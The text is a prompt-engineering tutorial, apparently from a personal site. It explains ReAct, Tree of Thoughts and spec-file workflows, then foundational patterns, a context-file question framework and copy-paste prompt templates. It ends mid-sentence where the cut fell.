## ReAct: Think → Act → Observe ReAct is a multi-phase reasoning pattern where you explicitly separate thinking from action. The key insight is that you don't just dump everything into one prompt—you pause at validation checkpoints between phases. I use this when each step builds on the previous one and I need confidence that we're not compounding errors. Before moving to the next phase, I check: Did the last step actually work? Core Idea ReAct (Reasoning + Acting) was formalized by Yao et al. (2022). The principle: explicit validation checkpoints between reasoning phases prevent hallucination chains from cascading.
### When to Use ReAct
- Multi-step tasks where each step depends on previous results
- You need to verify before continuing (database migrations, system changes, complex data pipelines)
- Error recovery is critical—you want to catch issues immediately, not at the end
- The task involves both planning and execution
### The Template ReAct Phase Structure
```
## Phase 1: [Name]
THINK: [What must be true before we act? What are we checking?]
ACT: [Specific, concrete tasks]
CHECK: [How do we verify this succeeded? What's the success criterion?]
## Phase 2: [Name]
THINK: [What did Phase 1 give us? What changed?]
ACT: [Next concrete tasks, informed by Phase 1 results]
CHECK: [Validation step]
[Repeat as needed]
```
### Real Example: Database Migration Database Migration via ReAct
```
## Phase 1: Schema Analysis
THINK: Do we understand the current schema? Are there constraints we'll break?
ACT:
- Inspect current table structure
- List all foreign keys and indexes
- Identify nullable vs non-nullable columns
CHECK: We have a complete picture of the schema. No surprises when we migrate.
## Phase 2: Migration Script Generation
THINK: Given what Phase 1 showed us, what migration script is safe?
ACT:
- Generate the migration using the constraints from Phase 1
- Include rollback statements
CHECK: Script is syntactically valid and includes rollback.
## Phase 3: Staging Deployment
THINK: Does this work in a realistic environment?
ACT:
- Run against staging database (copy of production)
- Verify data integrity post-migration
- Check query performance
CHECK: No errors on staging. Query performance acceptable.
## Phase 4: Production
THINK: We have evidence from staging. Are we ready?
ACT:
- Create production backup
- Run migration
- Verify against production data
CHECK: Migration succeeded. Data integrity confirmed. Rollback tested and works.
```
The Insight The CHECK step is what separates ReAct from just writing a longer prompt. You're forcing explicit validation. If the model says "check passed," you actually verify it independently. This is where the reliability comes from. Pattern 2
## Tree of Thoughts: Explore Before Committing Tree of Thoughts is about generating multiple approaches to a decision, evaluating their tradeoffs, then choosing one with documented reasoning. You're not just picking the first reasonable option—you're deliberately exploring the decision space. I use this when a decision has real tradeoffs. The output isn't just the choice; it's the reasoning that justifies it. That reasoning becomes reusable for future similar decisions. Core Idea Tree of Thoughts (Yao et al., 2023) formalizes decision-making as a multi-branch search. You generate candidate approaches, evaluate each against criteria, then select the best with explicit justification.
### When to Use Tree of Thoughts
- Multiple valid approaches exist with different tradeoffs
- You need to document WHY you chose one over others (for future reference or stakeholders)
- The decision affects downstream work or architecture
- Risk tolerance matters—some options are safer than others
### The Template Tree of Thoughts Decision Structure
```
## Decision: [What's being decided?]
[Context: Why are we deciding? What's at stake?]
### Option A: [Name]
- Pros: [Benefits, what goes right]
- Cons: [Drawbacks, what goes wrong]
- Effort: [Implementation cost, e.g., 2 days]
- Risk: [Low / Med / High, and why]
### Option B: [Name]
- Pros: [...]
- Cons: [...]
- Effort: [...]
- Risk: [...]
### Option C: [Name]
[Same structure]
### Recommendation
Choose [X] because [explicit reasoning given constraints].
Key tradeoff we're accepting: [What are we giving up?]
```
### Real Example: Security Config Modernization Migration Strategy via Tree of Thoughts
```
## Decision: Modernize API authentication to OAuth 2.0
Context: Current system uses API keys in headers. It's insecure and hard to audit.
We need to move but must maintain backward compatibility for 90 days (Q2 migration window).
### Option A: Keep Current System
- Pros: Zero effort, zero risk, no breaking changes
- Cons: Security risk remains, audit trail weak, tech debt grows
- Effort: 0 days
- Risk: Low (no change = no breakage)
### Option B: Parallel Systems (Recommended)
- Pros: Gradual migration path, clients can transition at own pace, rollback is safe
- Cons: Two auth systems to maintain for 90 days, testing burden is higher
- Effort: 5 days (OAuth implementation + migration logic)
- Risk: Medium (complexity of dual-system, but reversible)
### Option C: Full Cutover
- Pros: Clean break, one auth system, audit trail complete
- Cons: Breaking change, forces all clients to migrate immediately, 24h downtime expected
- Effort: 3 days (faster because no parallel logic)
- Risk: High (client outages, support burden)
### Recommendation
Choose Option B (Parallel Systems) because:
- We have a 90-day window; gradual migration is safer
- Client ecosystem is fragmented; not everyone can upgrade in parallel
- Tradeoff we're accepting: 5 days of dev vs. 30 days of operational complexity (worth it)
- Rollback path is clear if OAuth implementation has issues
```
The Insight You'll do this decision again. By documenting your reasoning upfront—why you rejected Option C, what tradeoff made Option B worth the effort—you save yourself from re-litigating the same choice six months from now. Pattern 3
## Spec-Kit: Separation of Concerns for Complex Tasks Spec-Kit is a file structure pattern. Instead of dumping everything into one massive prompt, you split complex work into 3-4 files that build on each other. Each file has a clear job. This scales to much larger problems than a single prompt can handle. I use this when context is too large or the task is repeatable. The knowledge base becomes write-once, use-forever. Every future task in that domain inherits it. Core Idea Spec-Kit is named after the specification kits used in aerospace and manufacturing. One document describes the system forever (knowledge base). Each project applies it to solve a specific instance (specification + plan). Context grows with complexity, not with each new task.
### The Three Files
#### 1. knowledge-base.md (Write Once) Domain context, architectural decisions, constraints, terminology. Answers questions like:
- What is this system's architecture?
- What constraints do we always operate under?
- What terminology does this domain use?
- What decisions have we already made and why? You write this once. Every future task in this domain reads it. It pays dividends over time.
#### 2. specification.md (Task-Specific) This task's requirements, acceptance criteria, edge cases. It reads the knowledge base and says "given all that, here's what we need to do right now."
- What is the goal?
- What's in scope? What's out?
- How do we know when we're done?
- What edge cases matter?
#### 3. implementation-plan.md (Task-Specific) Phased execution with dependencies and validation checkpoints. This is where you apply ReAct and Tree of Thoughts to the specific task.
- Phase 1: [What goes first? Why?]
- Phase 2: [What depends on Phase 1?]
- Validation: [How do we know each phase succeeded?]
- Rollback: [How do we undo if something fails?]
### When to Use Spec-Kit
- Complex, multi-step work that's hard to fit in a single prompt
- The task is repeatable or similar tasks will follow (migrations, architecture decisions, configurations)
- You need to collaborate with others (specs serve as shared references)
- High-stakes decisions where getting it right matters more than speed
- Across technical and non-technical domains (works for business tasks too—interview prep, priority documents, fundraising pitch)
### Template: knowledge-base.md Reusable Domain Context
```
# Knowledge Base: [Domain Name]
## System Architecture
[How is this system organized? What are the main components?]
## Constraints
[What's always true? What can never change?]
- [Constraint 1]
- [Constraint 2]
## Terminology
| Term | Definition |
| --- | --- |
| [Term] | [Definition] |
## Key Decisions Made
- [Decision 1]: [Why we chose this]
- [Decision 2]: [Why we chose this]
## Common Patterns
[How do we usually solve problems in this domain?]
```
### Template: specification.md Task-Specific Requirements
```
# Specification: [Task Name]
## Goal
[What are we trying to achieve?]
## Context
[Why are we doing this? What's the business reason?]
## Scope
### In Scope
- [Requirement 1]
- [Requirement 2]
### Out of Scope
- [What we're explicitly not doing and why]
## Acceptance Criteria
- [ ] Criterion 1
- [ ] Criterion 2
## Edge Cases
[What could go wrong? What's unusual about this task?]
```
### Template: implementation-plan.md Phased Execution Plan
```
# Implementation Plan: [Task Name]
## Phase 1: [Name]
Depends on: [Nothing / Phase 0]
Duration: [Estimate]
THINK: [What do we need to verify before acting?]
ACT: [Concrete tasks]
CHECK: [Validation step]
## Phase 2: [Name]
Depends on: [Phase 1]
Duration: [Estimate]
THINK: [...]
ACT: [...]
CHECK: [...]
## Rollback
[How do we undo this if something goes wrong?]
```
### Cross-Domain Example Spec-Kit works everywhere. Here's how you'd apply it to interview prep (business, not technical): Business Task: Interview Prep
```
## knowledge-base.md
### Company Context
- Founded 2015, 800 people, Series C
- Fundraising in Q3 targeting $50M
- Product: Developer tools for monitoring
### Common Questions We See
- "How do you handle scale?" → Technical depth needed
- "What's your vision?" → CEO alignment matters
- "Why join now?" → Understanding their fundraising matters
## specification.md
### Goal
Prepare for interviews at TechCorp for Staff Engineer role
### Acceptance Criteria
- [ ] Can answer 15 technical depth questions
- [ ] Can articulate how my background aligns with their problems
- [ ] Can explain why this role at this stage
## implementation-plan.md
### Phase 1: Deep Dive on Technical Stack
- Spend 4 hours on their architecture docs
- Run their demo, break it, understand failure modes
### Phase 2: Study Their Problems
- What are 3 things they're probably struggling with at scale?
- How does my experience address those?
### Phase 3: Interview Dry Run
- Friend asks random interview questions
- Get feedback on clarity and depth
```
Important Don't over-engineer. If the task is "rename a variable," you don't need Spec-Kit. Use it when complexity is real, when context is large, or when you're solving the same problem more than once. Pattern Selection
## Choosing the Right Pattern These patterns aren't mutually exclusive. The question isn't "which one should I use?" It's "which combination solves this task cleanly?"
### Decision Table
| Task Type || Pattern || Why This Works |
| Simple, well-understood || Foundational (Persona + Few-Shot) || Don't add complexity where it doesn't belong |
| Multi-step with dependencies || ReAct || Validation checkpoints prevent error cascades |
| Decision with real tradeoffs || Tree of Thoughts || Documented reasoning is reusable |
| Complex, high-stakes, repeatable || Spec-Kit || Separation of concerns scales to large contexts |
| Large task combining all of above || Combine them || ReAct phases + ToT decisions + Spec-Kit files |
### Practical Combinations **Scenario 1: Database Migration **
- Use Spec-Kit: knowledge-base describes the system, specification says which tables, plan says which phases
- Use ReAct: Each phase has THINK/ACT/CHECK steps
- Result: Highly structured, low-risk execution **Scenario 2: Architecture Decision **
- Use Tree of Thoughts: Explore monolith vs. microservices vs. serverless
- Use Spec-Kit knowledge-base: Document constraints (team size, latency requirements, budget)
- Result: Justified decision that stakeholders understand **Scenario 3: Feature Implementation **
- Use Spec-Kit: knowledge-base for domain context, specification for requirements
- Use ReAct: Implementation plan with phases
- Result: Clear scope, execution discipline, testable outcomes Anti-Pattern **Over-engineering simple tasks. **If you're adding ReAct phases to rename a variable or using Spec-Kit for a 10-minute task, you've lost the plot. These patterns have cognitive overhead. They pay off when complexity is real. Rule of Thumb Start simple. If you find yourself confused about state, unsure where you are in the task, or making the same decision repeatedly, that's when you upgrade to a more complex pattern. References
## Quick Reference
### Papers & Sources
| Pattern || Citation || Key Insight |
| ReAct || Yao et al. (2022) "ReAct: Synergizing Reasoning and Acting in Language Models" || Validation checkpoints between reasoning phases |
| Tree of Thoughts || Yao et al. (2023) "Tree of Thoughts: Deliberate Problem Solving with Language Models" || Multi-branch exploration before committing |
| Prompt Patterns || White et al. (2023) "A Prompt Pattern Catalog to Enhance Prompt Engineering with ChatGPT" || 16+ catalogued patterns (foundational and advanced) |
### Related Resources [Foundational Prompting Patterns ]()covers Persona, Few-Shot, Chain-of-Thought, and Output Format. Those are your building blocks. The patterns here are what you build when the foundational ones aren't enough.
### When You're Stuck
- **Task feels too large to fit in one prompt: **Use Spec-Kit
- **You keep making the same decision over again: **Use Tree of Thoughts (document your reasoning)
- **Each step depends on the previous one: **Use ReAct with CHECK steps
- **You're not sure if it worked: **Add validation checkpoints
- **You're over-engineering: **Strip it back. Start simple. Upgrade when complexity demands it. Joey Lopez · 2026 · [jrlopez.dev ]()
[← jrlopez.dev ]()· [← foundational patterns ]()· [guardrails → ]()[.md ]()
---
# prompting.md
# https://jrlopez.dev/p/prompting.html
---
title: "Prompt Patterns (Foundational)"
description: "Zero-shot, few-shot, chain-of-thought, persona, template."
author: "Joey Lopez"
date: "2025-10-20"
tags: ["prompting", "reference", "teaching", "template"]
atom_id: 4
source_html: "prompting.html"
url: "https://jrlopez.dev/p/prompting.html"
generated: true
---
[jrlopez.dev ]()[The gap ]()[Approaches ]()[Patterns ]()[Second brain ]()[Reference ]()
# Prompt Engineering Notes Workshop notes cleaned up. Patterns, anti-patterns, and exercises from real sessions. Take what's useful. Joey Lopez [the gap ]()[approaches ]()[patterns ]()Section 01 I didn't invent any of this. Chain of Thought is from Wei et al., Tree of Thoughts is from Yao et al., the Persona and Template patterns are catalogued in White et al. I just organized them in the order I wish someone had shown me.
## The gap The fastest way to understand prompt engineering is to feel the difference. Here's a quick exercise I use in workshops. Try this **Open whatever AI tool you use. **Type this and save the output:
```
Write a Python function that validates email addresses.
```
Then try this one. Same task:
```
You are a senior Python developer building a user registration API.
Write an email validation function with these requirements:
- Must handle edge cases: plus-addressing (user+tag@domain),
international domains, and subdomains
- Return a typed result (valid/invalid) with specific error reasons
- Include type hints and follow PEP 8
Example input/output:
validate_email("user@example.com") -> ValidationResult(valid=True)
validate_email("user@") -> ValidationResult(valid=False, error="Missing domain")
validate_email("user+tag@sub.example.co.uk") -> ValidationResult(valid=True)
Constraints:
- Do NOT use the 're' module for the core logic
- Must handle at least 5 explicit edge cases
- Include docstring with usage examples
```
Same AI. Same model. Same task. The second output is more specific, more tested, more usable. The difference isn't what the AI knows -- it's what you gave it to work with. That's basically the whole idea. Everything below -- every pattern, every template -- is just a different way of getting the right context in front of the model faster.
### Three intuitions These explain most of what happens in AI interactions:
| Intuition || What it means || Analog |
| **Context is everything ** || The model completes patterns from what you give it. More relevant context = better output. || A vague Jira ticket produces vague work. |
| **Structure gets rewarded ** || Organized input produces organized output. The model was trained to respect structure. || A well-formatted code review gets better responses than a wall of text. |
| **You are the retrieval system ** || Every AI interaction is: retrieve context, assemble it, generate. The question is who's doing the retrieval. || Re-explaining your project every conversation = doing retrieval by hand. |
These three ideas explain RAG, prompt engineering, context windows, and most of what enterprise AI platforms do. The terminology doesn't matter yet. The intuitions do. Section 02
## Three approaches Not every task needs the same level of effort. Using a four-file spec-driven workflow to fix a typo is overkill. I think about it as: what are the stakes? **Simple, one-off task? **
Yes → Freestyle. Just type and send.
No ↓
**Will you repeat this? Does quality matter? **
Yes → Systematic prompt. Add patterns.
No ↓
**Complex, multi-step, or high-stakes? **
Yes → Spec-driven. Multiple files, structured workflow.
### Freestyle Just talk to the AI. No structure, no patterns. This is how most people use AI most of the time, and for quick questions and throwaway tasks, it's fine. **Use it for: **Quick questions, brainstorming, anything you'd delete in an hour. **Stop using it when: **You find yourself re-explaining context, correcting output, or doing the same task twice.
### Systematic prompts Apply named patterns -- persona, few-shot, chain-of-thought, output format -- to a single prompt. This is the workhorse. Freestyle
```
Help me review this pull request.
```
Generic feedback. Misses project conventions. Systematic
```
You are a senior code reviewer
focused on maintainability.
Review this PR against these criteria:
- Error handling completeness
- Test coverage for edge cases
- Naming conventions (camelCase)
Flag severity: MUST FIX / SHOULD FIX / NIT
Example:
MUST FIX: Missing null check on line 42.
userService.getUser() can return null
but is used without guard.
PR diff:
[paste diff]
```
Specific, actionable, consistently formatted.
### Spec-driven For complex multi-step work: separate your knowledge, requirements, and execution plan into distinct files. Feed them to the AI in order. **The three files: **
| File || Contains || Reusable? |
| knowledge-base.md || Domain context, architecture decisions, constraints, terminology || Yes -- project-level |
| specification.md || This feature's requirements, acceptance criteria, edge cases || No -- feature-level |
| implementation-plan.md || Phased execution, dependencies, validation checkpoints || No -- task-level |
The knowledge base is write-once, use-forever. You build it on day one and every future spec inherits it.
### Where these come from These aren't categories I made up. They map to existing industry practices:
| Approach || Industry equivalent || Maturity |
| Freestyle || Ad-hoc ChatGPT/Copilot usage || Universal |
| Systematic || ADRs + .github/copilot-instructions.md || 10+ years |
| Spec-driven || GitHub spec-kit, Kiro, structured file workflows || Experimental |
Honest assessment Systematic prompts (ADRs + config files) are **proven at scale **across Microsoft, AWS, Google, Netflix, and Spotify. Spec-driven workflows are newer and less battle-tested. Both work. The difference is maintenance overhead vs. task complexity. Use the simplest approach that handles your complexity. Escalate when you need to, not before. Section 03
## Patterns Every effective prompt is built from a small set of composable patterns. I think of them like tools in a toolbox -- a hammer isn't better than a screwdriver, but using a hammer on a screw will ruin your day.
### Foundational patterns These four cover roughly 80% of daily prompt engineering. I'd get comfortable with these before reaching for the advanced ones. Persona Proven I use this when I need domain expertise, consistent tone, or a specific frame of reference. **Template: **
```
You are [role] with [specific expertise].
Your focus areas include [domains].
[Task]
```
Without persona
```
Explain this database schema.
```
With persona
```
You are a database architect
specializing in high-throughput
transactional systems.
Explain this schema, focusing on:
- Indexing strategy
- Query performance implications
- Normalization tradeoffs
```
Why it works The persona biases the model toward responses that people with that expertise would produce in the training data. The more specific the persona, the more targeted the activation. **Source: **White et al. (2023), "A Prompt Pattern Catalog" -- arXiv 2302.11382 Few-Shot Proven I use this when showing is faster than explaining -- when I have a transformation or format that's hard to describe but easy to demonstrate. **Template: **
```
Transform inputs using these examples:
Example 1:
Input: [example input]
Output: [example output]
Example 2:
Input: [example input]
Output: [example output]
Now transform:
Input: [your actual input]
```
Without examples
```
Convert these Java imports
to the new namespace.
```
With examples
```
Convert imports using these rules:
Example:
Before: import javax.validation.Valid;
After: import jakarta.validation.Valid;
Example:
Before: import javax.servlet.http.*;
After: import jakarta.servlet.http.*;
Now convert:
import javax.persistence.Entity;
```
Why it works Two to three examples establish a pattern more reliably than a paragraph of instructions. The model extracts the transformation rule and applies it. More than three examples rarely helps -- diminishing returns set in fast. **Source: **Brown et al. (2020), "Language Models are Few-Shot Learners" -- the GPT-3 paper Chain-of-Thought Proven I use this when the task requires multi-step reasoning or debugging, and I need to see (and verify) the logic. **Template: **
```
Solve this step by step:
1. First, analyze [aspect]
2. Then, evaluate [aspect]
3. Next, consider [aspect]
4. Finally, recommend [action]
Show your reasoning for each step.
```
Without CoT
```
Why is this API slow?
```
With CoT
```
Debug this API latency issue
step by step:
1. Check the query execution plan
2. Identify N+1 query patterns
3. Evaluate connection pool config
4. Check for missing indexes
5. Review payload size
Show reasoning for each step.
Endpoint: GET /api/users
Avg response: 2.3s
Expected:<200ms
```
Why it works Step-by-step reasoning reduces errors on complex tasks by 10-30% in benchmarks. More importantly, it makes errors visible. When you can see the reasoning chain, you can catch where it went wrong instead of getting a confidently wrong final answer. **Source: **Wei et al. (2022), "Chain-of-Thought Prompting Elicits Reasoning in Large Language Models" -- arXiv 2201.11903 Output Format (Template) Proven I use this when I need consistent, parseable, or copy-paste-ready output -- when the format matters as much as the content. **Template: **
```
Respond in this exact format:
## Summary
[2-3 sentences]
## Changes Required
- [ ] Change 1: [description]
- [ ] Change 2: [description]
## Risk Assessment
| Risk | Severity | Mitigation |
|------|----------|------------|
| ... | ... | ... |
```
Why it works The model was trained on millions of interactions where structured requests got structured responses. When you provide a template, the output almost always mirrors it.
### Advanced patterns I reach for these when the foundational patterns aren't enough -- when there are dependencies between steps, multiple valid approaches, or several concerns to orchestrate. ReAct Research-backed I use this for multi-phase work where each phase depends on the previous one and I need validation checkpoints between steps. **Template: **
```
## Phase 1: [Name]
THINK: [What must be true before we act?]
ACT: [Specific tasks]
CHECK: [How to verify this phase succeeded]
## Phase 2: [Name]
THINK: [What did Phase 1 give us?]
ACT: [Next tasks]
CHECK: [Validation]
```
Example: database migration
```
## Phase 1: Schema Backup
THINK: Must have rollback before any DDL changes
ACT: pg_dump --schema-only > backup_schema.sql
CHECK: Backup file exists and is non-empty
## Phase 2: Add New Columns
THINK: Schema backup confirmed, safe to alter
ACT: ALTER TABLE users ADD COLUMN email_verified BOOLEAN DEFAULT FALSE;
CHECK: \d users shows new column, existing data intact
## Phase 3: Backfill Data
THINK: Column exists, now populate from legacy flag
ACT: UPDATE users SET email_verified = (status = 'verified');
CHECK: SELECT COUNT(*) WHERE email_verified IS NULL = 0
```
**Source: **Yao et al. (2022), "ReAct: Synergizing Reasoning and Acting in Language Models" Tree of Thoughts Research-backed I use this when multiple valid approaches exist and the tradeoffs depend on my specific context -- when I need to document why I chose option A over B. **Template: **
```
## Decision: [What needs deciding]
### Option A: [Name]
- Pros: [benefits]
- Cons: [drawbacks]
- Effort: [estimate]
- Risk: [Low/Med/High]
### Option B: [Name]
[same structure]
### Option C: [Name]
[same structure]
### Recommendation
Choose [X] because [rationale given constraints].
```
When not to use this Don't force this when only one reasonable approach exists. Manufacturing fake alternatives wastes time. If the answer is obvious, just do it. **Source: **Yao et al. (2023), "Tree of Thoughts: Deliberate Problem Solving with Large Language Models" Meta-Prompting (Orchestration) Production-ready I use this when I need to combine multiple patterns, synthesize context from several sources, or create a reproducible workflow. **Template: **
```
# Task: [What we're building]
## Context Synthesis
From knowledge-base.md:
- Domain rules: [extracted]
- Constraints: [extracted]
From specification.md:
- Requirements: [extracted]
- Success criteria: [extracted]
## Execution
Using ReAct phases from implementation-plan.md:
Phase 1: [action] -> Validate: [check]
Phase 2: [action] -> Validate: [check]
Using Tree of Thoughts decisions:
Decision 1: Chose [X] because [reason]
## Generate
[Final output instructions]
```
### Combining patterns These are composable. I start with one and add others only when they earn their place:
| Task complexity || Patterns I typically use |
| Simple (5-15 min) || Persona + Few-shot |
| Medium (30-60 min) || Persona + Few-shot + Output format + Chain-of-Thought |
| Complex (hours+) || All foundational + ReAct + Tree of Thoughts + Meta-prompting |
Common mistake Over-engineering simple tasks. If you're adding ReAct phases to rename a variable, you've lost the plot. Use the simplest approach that handles your complexity. Section 04
## Second brain Every conversation, you re-explain your project, your role, your constraints. You're doing context retrieval by hand, every time. The fix is writing it down once.
### Start with 10 questions Don't try to capture everything. Answer these in a single file. That file is your second brain v1. The first 10 questions
- What project are you working on right now?
- In one sentence, what does it do and who is it for?
- What's the tech stack?
- What are the 3 biggest constraints you work within?
- What does "done" look like for your typical work items?
- What mistakes do people make repeatedly on your project?
- What do you wish the AI already knew about your work?
- What output format do you prefer? (bullet points, tables, prose, code?)
- What should the AI *never *assume about your work?
- What's the one thing you re-explain in every AI conversation? Try this Create a file called my-context.md. Answer questions 1, 2, 3, and 10. Four answers, five minutes. Start a new AI conversation, paste that file at the top, and ask it to do something you'd normally do. Notice how much less explaining you need.
### The full framework: 100 questions Once the first 10 click, here's the expanded version. It's organized in two tiers:
| Tier || Goal || Questions || Time |
| **Tier 1: Knowledge Extraction ** || Get what's in your head into notes || 50 questions across domain, requirements, tech, patterns, people || 3-4 hours |
| **Tier 2: Knowledge Composition ** || Compose those notes into a reusable AI context file || 50 questions across AI usage, role, output standards, task patterns, composition || 2-3 hours |
Tier 1: Knowledge Extraction (50 questions)
#### Section A: Domain Context
- What project/product are you working on right now?
- In one sentence, what does it do and who is it for?
- What's the business problem it solves?
- Who are the main stakeholders and what do they care about?
- What's the current state vs. the desired state?
- What are the 3 biggest constraints you work within?
- What decisions have already been made that you can't change?
- What's the history? Why does it look the way it does?
- What would a new team member need to understand in their first week?
- What do people outside your team consistently misunderstand about your domain?
#### Section B: Requirements and Standards
- What does "done" look like for typical work items?
- What's the definition of quality in your context?
- What are the non-negotiable requirements?
- What are the "nice to haves" vs "must haves"?
- What approval processes exist and who's involved?
- What documentation standards do you follow?
- What testing/validation is required before shipping?
- What are the common acceptance criteria patterns?
- What gets work items rejected or sent back?
- What does your QA/review process actually check?
#### Section C: Technical Context
- What's the tech stack?
- What integrations or dependencies exist?
- What are the known technical constraints?
- What's fragile or risky to change?
- What environments exist?
- What data is involved and where does it live?
- What are the common technical gotchas?
- What's the deployment/release process?
- What monitoring or observability exists?
- What technical debt are you carrying?
#### Section D: Patterns and Anti-Patterns
- What's a well-written work item in your context? (give an example)
- What's a badly-written one? Why did it fail?
- What patterns keep recurring?
- What mistakes do people make repeatedly?
- What shortcuts exist that people should know about?
- What "obvious" solutions don't actually work and why?
- What tribal knowledge exists that isn't documented?
- What questions do new people always ask?
- What do you wish someone had told you when you started?
- What's the "right way" vs. what actually happens?
#### Section E: People and Process
- Who needs to be involved in what types of decisions?
- Who has context that others lack?
- What communication norms exist?
- What meetings matter and what do they accomplish?
- What's the escalation path when things go wrong?
- Who are the bottlenecks and why?
- What politics or sensitivities should people be aware of?
- What's the feedback loop for completed work?
- How do priorities get set and changed?
- What do you personally know that your team doesn't? Tier 2: Knowledge Composition (50 questions)
#### Section F: Current AI Usage
- What AI tools do you currently use?
- What do you use them for?
- What works well? What outputs do you actually use?
- What doesn't work? What do you always have to fix?
- What context do you repeatedly explain to AI?
- What do you copy-paste into prompts frequently?
- What prompts do you reuse vs. write fresh?
- How much back-and-forth does it take to get useful output?
- What would "AI understands my context" look like?
- What's the highest-value task AI could help with if it had full context?
#### Section G: Role and Identity
- What's your role? What are you responsible for?
- What decisions do you make vs. defer?
- What's your deep expertise?
- What's your perspective on how things should be done?
- What standards do you hold yourself to?
- What tone/style do you communicate in?
- What are your non-negotiables?
- What do you want AI to assume about you?
- What should AI never assume about you?
- If AI were your assistant, what would a good one know?
#### Section H: Output Standards
- What does good output look like? (give an example)
- What format do you prefer?
- What level of detail is right?
- What terminology should AI use or avoid?
- What common AI outputs do you always fix?
- What would make AI output copy-paste ready?
- What's the review process for AI-generated content?
- What gets rejected and why?
- What style guides apply?
- How do you measure whether AI output was useful?
#### Section I: Task Patterns
- What types of tasks do you repeat weekly?
- For each: what's the input? What's the expected output?
- What context does each task type require?
- What are the common variations?
- What's the workflow from request to completion?
- What templates or structures do you use?
- What checklists or validation steps exist?
- What's the 80/20? (20% of tasks that are 80% of work)
- What tasks could be automated vs. need judgment?
- What's the handoff to the next step?
#### Section J: Context Composition
- Which Tier 1 notes are essential for AI?
- Which are "always relevant" vs "sometimes relevant"?
- What's the hierarchy?
- What should be included by default?
- What's the right chunk size?
- How should notes be ordered for comprehension?
- What links reveal critical related context?
- What's the minimal viable context?
- What's the maximal context?
- How do you know when the context file is "done enough"?
### The context file template Once you've answered the questions, compose them into this format. This is the file you paste into every AI conversation:
```
# [Your Name]'s Context File
## Who I Am
[Role, expertise, standards -- from Section G]
## My Domain
[Project context, constraints, stakeholders -- from Tier 1]
## How I Work
[Task patterns, workflows, output standards -- from Sections H/I]
## What Good Looks Like
[Examples, format preferences, terminology -- from Section H]
## AI Instructions
[What to assume, what to avoid, communication style -- from Section G]
```
How to test it Use your context file on three real tasks. After each one, note: how much correction was needed? What context was missing? What was noise? Update the file. By the third iteration, you should need less than 20% correction -- down from 50%+ without the file.
### Why links matter If you use a linked note system (Obsidian, Roam, Notion with links), the connections between notes become useful:
| Tags (flat search) || Links (graph traversal) |
| "Show me notes tagged #requirements" || "Show me requirements AND everything connected to them" |
| You get what you asked for || You get what you asked for + related context you forgot |
| Good for known queries || Good for discovery |
The link structure is the advantage. When your notes eventually feed a retrieval system, links let it pull in connected context that keyword search would miss. Section 05
## Reference
### Pre-prompt checklist I run through this before writing any non-trivial prompt:
| Check || Pattern || Add if... |
| Would a role help? || Persona || Task needs domain expertise |
| Can I show examples? || Few-shot || Easier to show than explain |
| Does format matter? || Output format || Need consistent/parseable output |
| Is reasoning complex? || Chain-of-Thought || Multi-step analysis or debugging |
| Multiple phases with dependencies? || ReAct || Need validation between steps |
| Real tradeoff to evaluate? || Tree of Thoughts || Multiple valid approaches |
### Copy-paste templates Debug code
```
You are a senior [language] developer.
Debug this error step by step:
1. Identify the root cause
2. Explain why it happens
3. Suggest the fix
4. Explain why the fix works
Error message:
[paste error]
Relevant code:
[paste code]
Environment: [language version, framework, OS]
```
Code review
```
You are a senior code reviewer focused on [maintainability/security/performance].
Review this code against:
- Error handling completeness
- Test coverage gaps
- Naming and style conventions
- Security concerns
Severity levels: MUST FIX / SHOULD FIX / NIT
Example:
MUST FIX (line 42): Missing null check.
userService.getUser() can return null but is
dereferenced without guard.
Code to review:
[paste code]
```
Write tests
```
You are a test engineer specializing in [framework].
Write tests for this code following these patterns:
Example test structure:
test('should [expected behavior]', () => {
// Arrange: [setup]
// Act: [execution]
// Assert: [verification]
});
Requirements:
- Cover happy path and at least 3 edge cases
- Include error scenarios
- Use descriptive test names
Code to test:
[paste code]
```
Architecture decision
```
You are a solutions architect.
I need to decide between [option A] and [option B]
for [specific use case].
Evaluate each option:
## Option A: [name]
- Pros: [list]
- Cons: [list]
- Effort: [hours/days]
- Risk: [Low/Medium/High]
- Maintenance burden: [description]
## Option B: [name]
[same structure]
Context:
- Team size: [N]
- Timeline: [deadline]
- Existing stack: [tech]
- Scale requirements: [metrics]
Recommend the best option with specific rationale
given my constraints.
```
Migration task
```
You are an expert [technology] migration engineer.
Migrate this code using these transformation rules:
Example:
Before: [old pattern]
After: [new pattern]
Example:
Before: [old pattern]
After: [new pattern]
Execute in phases:
Phase 1: [what to change first]
Validate: [how to verify]
Phase 2: [what to change next]
Validate: [how to verify]
Constraints:
- Preserve all existing behavior
- Do NOT change [specific things to protect]
- Must pass [existing tests/checks]
Code to migrate:
[paste code]
```
Spec-driven workflow (3 files) **File 1: knowledge-base.md **
```
# Project Knowledge Base
## Domain Concepts
- [Term]: [Definition]
- [Term]: [Definition]
## Architectural Principles
- [Pattern]: [Rationale]
- Anti-patterns: [What to avoid]
## Constraints
- Technical: [list]
- Regulatory: [list]
- Organizational: [list]
## Past Decisions
- [Decision]: [Rationale] (Date: [when])
```
**File 2: specification.md **
```
# Feature Specification: [Name]
## Requirements
- [ ] Requirement 1
- [ ] Requirement 2
## Acceptance Criteria
- [ ] Criterion 1 (testable)
- [ ] Criterion 2 (testable)
## Edge Cases
- [Case 1]: [How to handle]
- [Case 2]: [How to handle]
## Out of Scope
- [What we're NOT doing]
```
**File 3: implementation-plan.md **
```
# Implementation Plan
## Phase 1: [Name]
THINK: [What must be true before we start?]
ACT: [Tasks]
CHECK: [Validation]
Effort: [Estimate]
## Phase 2: [Name]
THINK: [What did Phase 1 give us?]
ACT: [Tasks]
CHECK: [Validation]
Depends on: Phase 1
## Rollback Plan
If any phase fails: [recovery steps]
```
**Usage: **Load files 1, 2, 3 into the AI in that order. Then say: "Execute the implementation plan, following the knowledge base constraints and specification requirements."
### Tool evaluation New AI tools show up constantly. These are the questions I ask:
| Question || Why it matters |
| How old is it? || Longer track record = more failure learning |
| Who uses it beyond the creators? || Multi-company adoption is a stronger signal than star counts |
| Does it work across platforms? || Vendor lock-in is expensive to undo |
| What problem does it actually solve? || Distinguish genuinely new capability from repackaging |
| What's the exit cost? || Time to learn, data portability, switching pain |
| Maturity || Track Record || Action || Examples |
| Tier 1 || 10+ years, multi-company || Adopt || ADRs, few-shot, chain-of-thought, persona |
| Tier 2 || 1-3 years, growing adoption || Adopt with monitoring || .github/copilot-instructions.md, ReAct, Cursor |
| Tier 3 || Months, limited evidence || Experiment cautiously || GitHub spec-kit, Kiro, Tessl |
### Common mistakes Mistake
```
Fix this code
```
No context, no constraints, no format. The AI guesses at everything. Fix
```
You are a Python expert.
This code throws a KeyError
on line 10 when the user dict
